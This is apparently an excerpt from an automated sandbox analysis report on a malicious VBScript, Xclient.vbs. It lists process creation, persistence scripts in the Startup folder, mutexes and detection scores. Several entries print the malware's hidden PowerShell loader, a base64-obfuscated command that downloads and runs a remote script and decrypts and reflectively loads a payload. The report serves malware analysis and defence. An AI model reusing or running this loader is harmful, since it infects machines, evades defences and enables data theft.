                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.powershell.exe.1d31326fc88.4.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.powershell.exe.1d31326fc88.4.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.1d7cdfeefc8.0.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.1d7cdfeefc8.0.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.powershell.exe.1d3130b0098.1.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.powershell.exe.1d3130b0098.1.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.1d7ce1adde0.11.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.1d7ce1adde0.11.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.1d7ce012688.10.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.1d7ce012688.10.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.1d7ce019498.1.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.1d7ce019498.1.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.powershell.exe.1d3130d3740.2.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.powershell.exe.1d3130d3740.2.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.powershell.exe.1d3130bafb0.5.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.powershell.exe.1d3130bafb0.5.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@52/31@4/4
                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\dwm.batJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3752:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\NZ6iGSEtCjLMGblP
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.batJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" "
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs"
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Xclient.vbsVirustotal: Detection: 8%
                Source: Xclient.vbsReversingLabs: Detection: 27%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1